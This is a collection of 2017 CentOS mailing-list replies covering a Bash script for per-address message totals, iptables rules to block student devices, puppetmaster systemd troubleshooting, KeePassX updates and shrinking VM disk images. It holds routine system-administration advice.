Not enough experience with the mainframe: I meant WinDoze. - Original Message - From: "m roth" <m.r...@5-cent.us> To: "centos" <centos@centos.org> Sent: Wednesday, October 25, 2017 1:02:54 PM Subject: Re: [CentOS] [OT] Bash help Leroy Tennison wrote: > No kidding, but in that "other OS" the answer to the question "how can I > create that report" is usually "You can't unless you spend money for a > third-party application". > "Other", singluar? Did you mean WinDoze, or on an IBM mainframe, or...? mark "been around the block" > - Original Message - > From: "m roth" <m.r...@5-cent.us> > To: "centos" <centos@centos.org> > Sent: Wednesday, October 25, 2017 12:27:28 PM > Subject: Re: [CentOS] [OT] Bash help > > Warren Young wrote: >> On Oct 25, 2017, at 11:00 AM, Leroy Tennison <le...@datavoiceint.com> >> wrote: >>> >>> Although "not my question", thanks, I learned a lot about array >>> processing from your example. >> >> Yeah, it’s amazing how many obscure corners of the Bash language must be >> tapped to solve such a simple problem. I count 7 features in that >> script >> that I almost never use, because I’d have just written this one in Perl >> if >> not required to write it in Bash by the OP. > > Let me say this: among the many reasons I like *Nix: in any other o/s, > it's "how co I create this report, and it takes from 2 days to 2 weeks. In > *Nix, it's "of all the ways I can create this report, how would I *prefer* > to do it" > > ___ > CentOS mailing list > CentOS@centos.org > https://lists.centos.org/mailman/listinfo/centos > ___ > CentOS mailing list > CentOS@centos.org > https://lists.centos.org/mailman/listinfo/centos > ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] [OT] Bash help
No kidding, but in that "other OS" the answer to the question "how can I create that report" is usually "You can't unless you spend money for a third-party application". - Original Message - From: "m roth" <m.r...@5-cent.us> To: "centos" <centos@centos.org> Sent: Wednesday, October 25, 2017 12:27:28 PM Subject: Re: [CentOS] [OT] Bash help Warren Young wrote: > On Oct 25, 2017, at 11:00 AM, Leroy Tennison <le...@datavoiceint.com> > wrote: >> >> Although "not my question", thanks, I learned a lot about array >> processing from your example. > > Yeah, it’s amazing how many obscure corners of the Bash language must be > tapped to solve such a simple problem. I count 7 features in that script > that I almost never use, because I’d have just written this one in Perl if > not required to write it in Bash by the OP. Let me say this: among the many reasons I like *Nix: in any other o/s, it's "how co I create this report, and it takes from 2 days to 2 weeks. In *Nix, it's "of all the ways I can create this report, how would I *prefer* to do it" ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] [OT] Bash help
Although "not my question", thanks, I learned a lot about array processing from your example. - Original Message - From: "warren"To: "centos" Sent: Wednesday, October 25, 2017 11:47:12 AM Subject: Re: [CentOS] [OT] Bash help On Oct 25, 2017, at 10:02 AM, Mark Haney wrote: > > I have a file with two columns 'email' and 'total' like this: > > m...@example.com 20 > m...@example.com 40 > y...@domain.com 100 > y...@domain.com 30 > > I need to get the total number of messages for each email address. This screams out for associative arrays. (Also called hashes, dictionaries, maps, etc.) That does limit you to CentOS 7+, or maybe 6+, as I recall. CentOS 5 is definitely out, as that ships Bash 3, which lacks this feature. #!/bin/bash declare -A totals while read line do IFS="\t " read -r -a elems <<< "$line" email=${elems[0]} subtotal=${elems[1]} declare -i n=${totals[$email]} n=n+$subtotal totals[$email]=$n done < stats for k in "${!totals[@]}" do printf "%6d %s\n" ${totals[$k]} $k done You’re making things hard on yourself by insisting on Bash, by the way. This solution is better expressed in Perl, Python, Ruby, Lua, JavaScript…probably dozens of languages. ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] how to prevent files and directories from being deleted?
chattr is a valuable but lesser-known tool, if you use it then document it somehow so other admins don't stumble over it. - Original Message - From: "hw"To: "centos" Sent: Tuesday, October 3, 2017 12:04:14 PM Subject: Re: [CentOS] how to prevent files and directories from being deleted? marcos valentine writes: > You can try chattr? > > https://en.wikipedia.org/wiki/Chattr Wow, I never needed/used that. Being able to make files undeletable might be a very useful thing ... -- "Didn't work" is an error. ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] Display IP addresses on the system console *before* the login prompt.
What does 'man agetty' (or whatever you're using) on the OS in question say? Ubuntu 14.04 doesn't list "\4{}" as an option and it doesn't work, 16.04 does and it does appear there (might have to press Enter to get a screen refresh). If the OS doesn't support it then you'll have to get creative (send 'ip addr' output to /etc/issue at boot or periodically) to get what you want. - Original Message - From: "Arun Khan"To: "centos" Sent: Monday, October 2, 2017 3:03:00 PM Subject: [CentOS] Display IP addresses on the system console *before* the login prompt. I have a bunch of VBox Linux VMs (CentOS 6/7, Debian7/8/9, Ubuntu (14.0/16.04, Alpine) that get dynamic IPs. To get their respecitive IP addresses I have to login and run 'ip addr' I would like such info to be displayed on the VM console *before* the login prompt. Ideally an ASCII log + info (see below sig line). Thus, I can get the info from the VM console without having to login. I read up on /etc/issue but adding "\4{eth0}" to the existing string does not work. TIA for solutions/pointers -- Arun Khan _ _ | |__ ___ ___| |_ _ __ __ _ _ __ ___ ___ | '_ \ / _ \/ __| __| '_ \ / _` | '_ ` _ \ / _ \ | | | | (_) \__ \ |_| | | | (_| | | | | | | __/ |_| |_|\___/|___/\__|_| |_|\__,_|_| |_| |_|\___| lo: 127.0.0.1 eth0: 10.1.1.122 kernel: 4.10.0-33-generic x86_64 login: ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] prevent users from fiddling with network?
As Scott said, nothing is perfect. On Ubuntu (16.04 - the current long term support version) all home directories are world executable/readable ("Security? What's that?"). - Original Message - From: "Scott Robbins"To: "centos" Sent: Thursday, September 21, 2017 9:40:03 PM Subject: Re: [CentOS] prevent users from fiddling with network? On Thu, Sep 21, 2017 at 07:00:12PM -0500, Valeri Galtsev wrote: > > On Thu, September 21, 2017 6:13 pm, Scott Robbins wrote: > > On Thu, Sep 21, 2017 at 05:23:23PM -0500, Valeri Galtsev wrote: > >> > > > > Well, this is my longstanding rant against RedHat and friends. Take a > > look > > at what Fedora is doing before blithely throwing it into RedHat. > >> > > Most Fedora stuff is for single user laptops, and frankly, a lot of it > > seems developed by people with no concept of system administration. > Well, I guess we see Microsoft money invested into ("donated" to? ;-) > RedHat at work. Yes, my servers are FreeBSD for long time already, but as > we have to use Linux for wide variety of stuff, we may need to start > looking which other distribution (better from sysadmin's prospective) to > flee to. Scott, I'd be glad to hear your advise on that matter. (As CentOS > public mirror maintainer I will keep maintaining that indefinitely as a > token of gratitude to the project that gave us so much over long time). Unfortunately, no advice. I haven't used Debian as anything but a laptop install for a long time, but their developers did, in the past, seem to have better ideas of system administration. They have their own issues, of course, nothing is perfect. -- Scott Robbins PGP keyID EB3467D6 ( 1B48 077D 66F6 9DB0 FDC2 A409 FA54 EB34 67D6 ) gpg --keyserver pgp.mit.edu --recv-keys EB3467D6 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] Block internet access for some users on the LAN ?
While I agree with all this, keep in mind this is a school and the proposed solution may not be feasible financially or realistically (Can a student in the computer lab unplug an Ethernet connection and plug their device in? Are the teachers systems in the same room as students?) If it's not then some lesser desirable but "better than nothing" solutions would be to get rid of DHCP and assign all static IPs (with just 80 systems this is possible though not desirable), change those IP ranges to just enough to meet the need for the specified systems and allow only IP addresses with a need for Internet access through the firewall. Is monitoring for defined system's IP addresses going offline possible? A good analysis of needs may surface options. Do the teachers need Internet access during school hours (it is possible via cron to have time-based firewall rules). What about the computer lab? Without knowing the specifics these questions are unanswerable. And we have to keep in mind "relative security" - if they have an "evil genius" student on their hands there will be a way around the best security which can be put in place. - Original Message - From: "Johnny Hughes"To: "centos" Sent: Monday, September 18, 2017 12:42:34 PM Subject: Re: [CentOS] Block internet access for some users on the LAN ? On 09/18/2017 12:23 PM, John R Pierce wrote: > On 9/18/2017 10:03 AM, Nicolas Kovacs wrote: >> This year the school's director wants to completely block Internet >> access for all the student's personal devices. > > MAC addresses can easily be forged, IP addresses can easily be changed, > none of that is secure if its on the same network segment > > The student's personal devices should be on a completely different > 'guest' subnet, enforced by the wireless infrastructure, via use of a > captive portal and/or WPA2-EAP authentication. Presumably most of > the schools infrastructure is on ethernet? those ethernet connections > should be kept physically secure so noone unauthorized can plug/unplug > anything into the ethernet. > > THEN you'd use iptables to enforce access restrictions on this guest > subnet. > > It would be extremely easy to, for example, try to get to the internet and fail .. look at my IP address and get my default gateway from my device (that I own) .. then try manually other network addresses until I find one that works (with the same gateway). That is, I can easily find the others segments (like the printers) and take a free address in that segment. Since the whole network is flat, It will let me out then. As John says .. if you want to isolate guest accounts, do it with a completely different network segment that is isolated from things you don't want them to access. You can then setup rules unique to that network segment that they can't forge (the gateway is the only way that segment can get out and all the rules are the same for any IP that will route from that segment). ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] Block internet access for some users on the LAN ?
Iptables is a very reasonable way to do it, basically you decide what devices should have Internet access, create accept rules for them and then have a default deny for everything else. - Original Message - From: "Nicolas Kovacs"To: "centos" Sent: Monday, September 18, 2017 12:03:56 PM Subject: [CentOS] Block internet access for some users on the LAN ? Hi, In our local school we have two servers and roughly 80 clients. The network is 192.168.10.0/255.255.255.0, and DHCP+DNS is managed by Dnsmasq. School PCs (teachers and management) are registered via MAC address and get an IP address in a specific range: 192.168.10.2 - 192.168.10.50 - management + teachers 192.168.10.201 - 192.168.10.220 - computer room 192.168.10.246 - 192.168.10.247 - printers 192.168.10.251 - 192.168.10.253 - wireless access points If a client (like a student's laptop, tablet or smartphone) is not registered, it gets an IP address in the range between 192.168.10.100 and 192.168.10.200. Up until recently I've been using a combination of Squid and Squidguard to filter Internet access. This year the school's director wants to completely block Internet access for all the student's personal devices. The Linux server acts as a transparent gateway. Unfortunately with Squid I can only filter/block HTTP connections, but not HTTPS (well, I could, but this is way too complicated to setup). The firewall is managed by a simple Iptables script. Now I *think* the easiest way to block a certain IP range from Internet access would be through Iptables (correct me if I'm wrong). If this is the case, what would that look like? Any suggestions? Niki Kovacs -- Microlinux - Solutions informatiques durables 7, place de l'église - 30730 Montpezat Web : http://www.microlinux.fr Mail : i...@microlinux.fr Tél. : 04 66 63 10 32 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] KeePassX replacement
keepassx.org shows the latest release as October 2016 (and the main page shows "2005-2017" so someone is updating it), if I found the right keepass 2 (keepass.info) it was updated in June 2017. I do remember receiving a security alert to upgrade keepassx (since I use it) quite some time back (but not years ago). - Original Message - From: "Valeri Galtsev"To: "centos" Sent: Monday, September 18, 2017 10:54:05 AM Subject: Re: [CentOS] KeePassX replacement On Sat, September 16, 2017 1:45 pm, Yves Bellefeuille wrote: > H wrote: > >> I have been using the KeePassX password manager on CentOS 6 and 7 for >> some time and it works pretty well. On my Windows machine I use >> KeePass which offers a number of features missing from KeePassX, I >> also sync the database between several machines, including Android >> units where I use keepass2android. Database compatibility is thus >> required. > > Are you aware that KeePass 2 works under Linux, with mono? There are > also ports for Android, but I've never tried them. > > You may have reasons to prefer KeePassX over KeePass 2, though. I for one use keepassx. My password database is synchronized between variety of systems, and I can view/edit it on: CentOS, FreeBSD, MS Windows, Android (and should be able on any derivatives of those). I didn't try iOS as currently I don't have a need in that. Incidentally, does anybody know if there is any necessity in keepassx to be patched? Did I read the original post correctly: there is no activity on the development site for long time? Should there be any? (As, I would say for comparison: cvs is so established software that there is no development to expect, only if there are any security holes found those need to be patched). Any insight on KeePassX anybody? Valeri > > -- > Yves Bellefeuille > > > ___ > CentOS mailing list > CentOS@centos.org > https://lists.centos.org/mailman/listinfo/centos > Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] Syncronize systemctl status with reality?
Hmmm, that's an interesting option, I'll have to look into it. - Original Message - From: "Alexander Dalloz" <ad+li...@uni-x.org> To: "centos" <centos@centos.org> Sent: Tuesday, August 29, 2017 4:17:37 PM Subject: Re: [CentOS] Syncronize systemctl status with reality? Am 29.08.2017 um 22:52 schrieb Leroy Tennison: > The AppPreloader is doing things (and probably confusing systemd in the > process) but I didn't start that, it was a part of the reboot. I looked at > /etc/init.d/puppetmaster to see if something strange was being done and it > was one of the simpler init scripts I've seen, uses start-stop-daemon. > > I don't have any control over this, 'systemctl list-unit-files | grep puppet' > shows the puppetmaster.service is enabled, I just need a "cleanup" solution, > any ideas? And, BTW, thanks for any feedback. Remove the Rack Puppet master server. https://docs.puppet.com/puppet/5.1/passenger.html#install-the-puppet-master-rack-application Alexander ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] Syncronize systemctl status with reality?
- Original Message - From: "James Hogarth" <james.hoga...@gmail.com> To: "centos" <centos@centos.org> Sent: Tuesday, August 29, 2017 2:03:44 PM Subject: Re: [CentOS] Syncronize systemctl status with reality? On 29 Aug 2017 17:58, "Leroy Tennison" <le...@datavoiceint.com> wrote: The particular issue is with puppetmaster (which admittedly takes 4 minutes to actually start, setting TimeoutStartSec=300 in it's unit file stopped the false timeout report) but I have seen it one other time (don't remember the details). systemctl status puppetmaster ● puppetmaster.service - Puppet master Loaded: loaded (/lib/systemd/system/puppetmaster.service; enabled; vendor preset: enabled) Active: failed (Result: resources) since Tue 2017-08-29 11:24:36 CDT; 22min ago Process: 897 ExecStart=/usr/bin/puppet master (code=exited, status=0/SUCCESS) Aug 29 11:22:39 puppetmaster02 systemd[1]: Starting Puppet master... Aug 29 11:24:36 puppetmaster02 puppet-master[1233]: Reopening log files Aug 29 11:24:36 puppetmaster02 puppet-master[1233]: Starting Puppet master version 3.8.5 Aug 29 11:24:36 puppetmaster02 puppet-master[1233]: Could not run: Address already in use - listen(2) Aug 29 11:24:36 puppetmaster02 systemd[1]: puppetmaster.service: PID 1233 read from file /run/puppet/master.pid does not exist or is a zombie. Aug 29 11:24:36 puppetmaster02 systemd[1]: Failed to start Puppet master. Aug 29 11:24:36 puppetmaster02 systemd[1]: puppetmaster.service: Unit entered failed state. Aug 29 11:24:36 puppetmaster02 systemd[1]: puppetmaster.service: Failed with result 'resources'. However, ps -ef | grep puppet (run just after the above) returns puppet 1380 1 0 11:26 ? 00:00:08 Passenger RubyApp: /usr/share/puppet/rack/ puppetmasterd root 2015 1341 0 11:48 pts/0 00:00:00 grep --color=auto puppet Earlier ps .. also reported puppet 1355 1166 3 11:26 ? 00:00:01 Passenger AppPreloader: /usr/share/puppet/rack/puppetmasterd And, the "bottom line", puppet agent -t on a client works. It reports finishing the catalog run and the client's yaml files on puppetmaster are up to date. Is there a command to tell systemd to re-scan running state and update its understanding on what it finds? I tried systemctl daemon-reload just to be sure that didn't solve the problem before posting this. ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos First glance ity looks like someone has started that puppetmaster manually at some point. As such it's not in a cgroup systemd is tracking so it isn't aware of it. Your attempts to start the service are failing because that manually started instance already has the port open. Kill it with pkill -f puppet and then use ss -tnp to check for the port being freed (wait for any time_wait states to go... which is why I'm not filtering by listen). Once it's clear then try starting with systemctl ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos OK, something weird is definitely going on here, I have the luxury of rebooting this system so it did. Here's what I got, note the time stamps. ps -ef | grep puppet root 932 1 0 15:23 ?00:00:00 /usr/bin/ruby /usr/bin/puppet master root 1343 1327 0 15:24 pts/000:00:00 grep --color=auto puppet (immediately afterward as fast as I could type:) uptime 15:24:56 up 1 min, 1 user, load average: 0.16, 0.07, 0.02 systemctl status puppetmaster ● puppetmaster.service - Puppet master Loaded: loaded (/lib/systemd/system/puppetmaster.service; enabled; vendor preset: enabled) Active: activating (start) since Tue 2017-08-29 15:23:44 CDT; 1min 24s ago Control: 932 (puppet) Tasks: 1 Memory: 2.4M CPU: 4ms CGroup: /system.slice/puppetmaster.service └─932 /usr/bin/ruby /usr/bin/puppet master Aug 29 15:23:44 puppetmaster02 systemd[1]: Starting Puppet master... After a short delay: systemctl status puppetmaster ● puppetmaster.service - Puppet master Loaded: loaded (/lib/systemd/system/puppetmaster.service; enabled; vendor preset: enabled) Active: failed (Result: resources) since Tue 2017-08-29 15:25:11 CDT; 11s ago Process: 932 ExecStart=/usr/bin/puppet master (code=exited, status=0/SUCCESS) Aug 29 15:23:44 puppetmaster02 systemd[1]: Starting Puppet master... Aug 29 15:25:11 puppetmaster02 puppet-master[1360]: Reopening log files Aug 29 15:25:11 puppetmaster02 puppet-master[1360]: Starting Puppet master version 3.8.5 Aug 29 15:25:11 puppetmaster02 puppet-master[1360]: Could not run: Address already in use - listen(2) Aug 29 15:25:11 puppetmaster02 systemd[1]: puppetmaster.service: PID 1360 read from file /run/puppet/master.pid does not exist or is a zombie. Aug 29 15:25:11 puppetmaster02 systemd[1]: Failed to start Puppet master. Aug 29 15:25:11 puppetmaster02 systemd[1]: puppetm
[CentOS] Syncronize systemctl status with reality?
The particular issue is with puppetmaster (which admittedly takes 4 minutes to actually start, setting TimeoutStartSec=300 in it's unit file stopped the false timeout report) but I have seen it one other time (don't remember the details). systemctl status puppetmaster ● puppetmaster.service - Puppet master Loaded: loaded (/lib/systemd/system/puppetmaster.service; enabled; vendor preset: enabled) Active: failed (Result: resources) since Tue 2017-08-29 11:24:36 CDT; 22min ago Process: 897 ExecStart=/usr/bin/puppet master (code=exited, status=0/SUCCESS) Aug 29 11:22:39 puppetmaster02 systemd[1]: Starting Puppet master... Aug 29 11:24:36 puppetmaster02 puppet-master[1233]: Reopening log files Aug 29 11:24:36 puppetmaster02 puppet-master[1233]: Starting Puppet master version 3.8.5 Aug 29 11:24:36 puppetmaster02 puppet-master[1233]: Could not run: Address already in use - listen(2) Aug 29 11:24:36 puppetmaster02 systemd[1]: puppetmaster.service: PID 1233 read from file /run/puppet/master.pid does not exist or is a zombie. Aug 29 11:24:36 puppetmaster02 systemd[1]: Failed to start Puppet master. Aug 29 11:24:36 puppetmaster02 systemd[1]: puppetmaster.service: Unit entered failed state. Aug 29 11:24:36 puppetmaster02 systemd[1]: puppetmaster.service: Failed with result 'resources'. However, ps -ef | grep puppet (run just after the above) returns puppet 1380 1 0 11:26 ? 00:00:08 Passenger RubyApp: /usr/share/puppet/rack/puppetmasterd root 2015 1341 0 11:48 pts/0 00:00:00 grep --color=auto puppet Earlier ps .. also reported puppet 1355 1166 3 11:26 ? 00:00:01 Passenger AppPreloader: /usr/share/puppet/rack/puppetmasterd And, the "bottom line", puppet agent -t on a client works. It reports finishing the catalog run and the client's yaml files on puppetmaster are up to date. Is there a command to tell systemd to re-scan running state and update its understanding on what it finds? I tried systemctl daemon-reload just to be sure that didn't solve the problem before posting this. ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] claiming unsused space back
I should have been more specific (and maybe ask "Are you seeing something different?") Admittedly, Ubuntu 16.04 LTS, but the qemu-img man page says for resize (What does the CentOS7 man page say?): resize filename [+ | -]size Change the disk image as if it had been created with size. Before using this command ... (warning about doing guest resizing first) After using ... (somewhat different message about guest resizing) No mention that shrinking only works with raw, not qcow2. Similar issue with virsh blockresize. I probably should have been more clear that the issue isn't commands or just command options, but significant limitations in scope for some of those options. - Original Message - From: "Johnny Hughes" <joh...@centos.org> To: "centos" <centos@centos.org> Sent: Tuesday, August 1, 2017 6:31:14 AM Subject: Re: [CentOS] claiming unsused space back On 07/31/2017 05:27 PM, Leroy Tennison wrote: > As has already been mentioned, some commands (or command options) are only > supported on later releases, the man pages don't say this. Does anyone know > of a source of information listing the command, option and version it is > implemented in? That alone would be a great help. > > - Original Message - > From: "Chris Adams" <li...@cmadams.net> > To: "centos" <centos@centos.org> > Sent: Monday, July 31, 2017 11:45:20 AM > Subject: Re: [CentOS] claiming unsused space back > > Once upon a time, Warren Young <war...@etr-usa.com> said: >> Zeroing the free space not only prevents inclusion of these discarded FS >> blocks, they compress better, too. > > Check out the "virt-sparsify" command - it does all of this for you. > Yes .. just run man on the machine in question. That has the commands for the man for the version of software installed on that specific machine. ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] claiming unsused space back
As has already been mentioned, some commands (or command options) are only supported on later releases, the man pages don't say this. Does anyone know of a source of information listing the command, option and version it is implemented in? That alone would be a great help. - Original Message - From: "Chris Adams"To: "centos" Sent: Monday, July 31, 2017 11:45:20 AM Subject: Re: [CentOS] claiming unsused space back Once upon a time, Warren Young said: > Zeroing the free space not only prevents inclusion of these discarded FS > blocks, they compress better, too. Check out the "virt-sparsify" command - it does all of this for you. -- Chris Adams ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] claiming unsused space back
Interesting, thanks, my situation was (obviously) using NTFS. I should add clarification that, although a qcow[2] to qcow[2] convert will reclaim the zeroed space, it does nothing to change the virtual size (qemu-img info ...) so the image can grow back to that size. Currently (on long term support distributions) you need to convert to raw, use qemu-resize to reduce the physical file size then convert back to qcow2 to get an adjusted virtual size. - Original Message - From: "Ruttkay Vladimir" <vladimir.rutt...@telekom.sk> To: "centos" <centos@centos.org> Sent: Monday, July 31, 2017 9:54:27 AM Subject: Re: [CentOS] claiming unsused space back If you are using XFS - there is mount option "discard|nodiscard" From XFS man page: discard|nodiscard Enable/disable the issuing of commands to let the block device reclaim space freed by the filesystem. This is useful for SSD devices, thinly provisioned LUNs and virtual machine images, but may have a performance impact. Note: It is currently recommended that you use the fstrim application to discard unused blocks rather than the discard mount option because the performance impact of this option is quite severe. For this reason, nodiscard is the default. Vladimir -Original Message- From: CentOS [mailto:centos-boun...@centos.org] On Behalf Of Leroy Tennison Sent: Monday, July 31, 2017 4:42 PM To: centos <centos@centos.org> Subject: Re: [CentOS] claiming unsused space back You're right, there's a procedure following it, once the space is zeroed qemu-img will recognize it as such and will eliminate it when 'convert' is used. Apparently Fedora qemu has some better capabilities to shrink partitions but they haven't made it to "long term support" distributions yet. For now, what has to be done to shrink qcow[2] partitions (raw works) is (regardless of client OS, for Windows defragment is first used followed by resizing the partitions in Disk Management then finally Sysinternals' sdelete to zero disk space - I have used this process and it works but with surprises): defragment (even Linux, look into e2defrag, shake, a defrag script or e4defrag - can be found on the web, haven't used them, YMMV), zero disk space, resize the partition, then use qemu-img to convert to raw (or even qcow - it works). However, to permanently resize you must convert to raw, shrink and re-convert to qcow2 if you want those capabilities. - Original Message - From: "Fred Smith" <fre...@fcshome.stoneham.ma.us> To: "centos" <centos@centos.org> Sent: Monday, July 31, 2017 8:50:57 AM Subject: Re: [CentOS] claiming unsused space back On Mon, Jul 31, 2017 at 08:28:49AM -0500, Leroy Tennison wrote: > I realize this is wandering off-topic but, if you have found Debian commands, > you're doing better than me. What are they? Also, are you allowing dd to > totally fill the partition (what I have found on the web as a > recommendation)? If so, is the OS surviving acceptably? > > - Original Message - > From: "Miguel González" <miguel_3_gonza...@yahoo.es> > To: "centos" <centos@centos.org> > Sent: Saturday, July 29, 2017 5:11:33 AM > Subject: [CentOS] claiming unsused space back > > Hi, > > I´m running a CentOS server in a VPS. Backups of the VPS take quite > much space if I don´t claim unused space. > > Currently I´m using dd if=/dev/zero of=/mytempfile and remove that file > to claim that unused space. Any automatic way of doing a similar thing > in CentOS? I have googled for it but I have only found Debian commands. > > Thanks in advance! I may be blind, but I don't seehow that technique can "reclaim" any space. all it does is fill up all the space not allocated to other files by creating one large file that occupies all otherwise unused disk space. presumably you'll delete that file once it is created, but you won't have any more free disk space than you had before. the only difference will be that that unused space will then be filled with zeroes. what are you actually wanting to do here? -- Fred Smith -- fre...@fcshome.stoneham.ma.us - The eyes of the Lord are everywhere, keeping watch on the wicked and the good. - Proverbs 15:3 (niv) - ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] claiming unsused space back
You're right, there's a procedure following it, once the space is zeroed qemu-img will recognize it as such and will eliminate it when 'convert' is used. Apparently Fedora qemu has some better capabilities to shrink partitions but they haven't made it to "long term support" distributions yet. For now, what has to be done to shrink qcow[2] partitions (raw works) is (regardless of client OS, for Windows defragment is first used followed by resizing the partitions in Disk Management then finally Sysinternals' sdelete to zero disk space - I have used this process and it works but with surprises): defragment (even Linux, look into e2defrag, shake, a defrag script or e4defrag - can be found on the web, haven't used them, YMMV), zero disk space, resize the partition, then use qemu-img to convert to raw (or even qcow - it works). However, to permanently resize you must convert to raw, shrink and re-convert to qcow2 if you want those capabilities. - Original Message - From: "Fred Smith" <fre...@fcshome.stoneham.ma.us> To: "centos" <centos@centos.org> Sent: Monday, July 31, 2017 8:50:57 AM Subject: Re: [CentOS] claiming unsused space back On Mon, Jul 31, 2017 at 08:28:49AM -0500, Leroy Tennison wrote: > I realize this is wandering off-topic but, if you have found Debian commands, > you're doing better than me. What are they? Also, are you allowing dd to > totally fill the partition (what I have found on the web as a > recommendation)? If so, is the OS surviving acceptably? > > - Original Message - > From: "Miguel González" <miguel_3_gonza...@yahoo.es> > To: "centos" <centos@centos.org> > Sent: Saturday, July 29, 2017 5:11:33 AM > Subject: [CentOS] claiming unsused space back > > Hi, > > I´m running a CentOS server in a VPS. Backups of the VPS take quite > much space if I don´t claim unused space. > > Currently I´m using dd if=/dev/zero of=/mytempfile and remove that file > to claim that unused space. Any automatic way of doing a similar thing > in CentOS? I have googled for it but I have only found Debian commands. > > Thanks in advance! I may be blind, but I don't seehow that technique can "reclaim" any space. all it does is fill up all the space not allocated to other files by creating one large file that occupies all otherwise unused disk space. presumably you'll delete that file once it is created, but you won't have any more free disk space than you had before. the only difference will be that that unused space will then be filled with zeroes. what are you actually wanting to do here? -- Fred Smith -- fre...@fcshome.stoneham.ma.us - The eyes of the Lord are everywhere, keeping watch on the wicked and the good. - Proverbs 15:3 (niv) - ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] claiming unsused space back
I realize this is wandering off-topic but, if you have found Debian commands, you're doing better than me. What are they? Also, are you allowing dd to totally fill the partition (what I have found on the web as a recommendation)? If so, is the OS surviving acceptably? - Original Message - From: "Miguel González"To: "centos" Sent: Saturday, July 29, 2017 5:11:33 AM Subject: [CentOS] claiming unsused space back Hi, I´m running a CentOS server in a VPS. Backups of the VPS take quite much space if I don´t claim unused space. Currently I´m using dd if=/dev/zero of=/mytempfile and remove that file to claim that unused space. Any automatic way of doing a similar thing in CentOS? I have googled for it but I have only found Debian commands. Thanks in advance! Miguel ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] What RH-like on a Dell XPS 15 (9590)?
And, if Ubuntu isn't pariah, even it's LTS has a reasonably current kernel. However, the "Debian way" (Debian, Ubuntu, others) is enough different than the "Red Hat way" (RHEL, CentOS, SuSE more or less) that, if it's important to you, stick with the RPM-based options. - Original Message - From: "Mike McCarthy, W1NR"To: "centos" Sent: Thursday, July 27, 2017 4:01:18 PM Subject: Re: [CentOS] What RH-like on a Dell XPS 15 (9590)? I would go with Fedora or OpenSUSE latest if you want RH like on that hardware. There is nothing that unstable about them other than losing updates and maintenance after 2 years and having to upgrade. Another choice is to run Virtualbox on the Windows that shipped with the laptop and run a CentOS 7 virtual guest. If you REALLY need RHEL (CentOS) running on the hardware I would return the XPS and get a Lattitude or Precision laptop. They have much better Linux support as they tend to be more stability oriented rather than latest and greatest hardware. Mike On 07/27/2017 01:25 PM, wwp wrote: > Hello there, > > > I've just got a Dell XPS 15 (9590) at work and need to set up a stable > GNU/Linux system on it. I thought of CentOS7, but.. obviously its > kernel can't run on this hardware. > > What would you recommend? Waiting for CentOS8 is not an option unless > it's a question of few weeks. Are there respins of the CentOS7 DVDs w/ > more top-recent kernels? I'm know of Fedora 26 or course, and not > willing to switch to Ubuntu 16.10 at all. > > > Regards, > > > > ___ > CentOS mailing list > CentOS@centos.org > https://lists.centos.org/mailman/listinfo/centos ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] getting rid of hp c3180
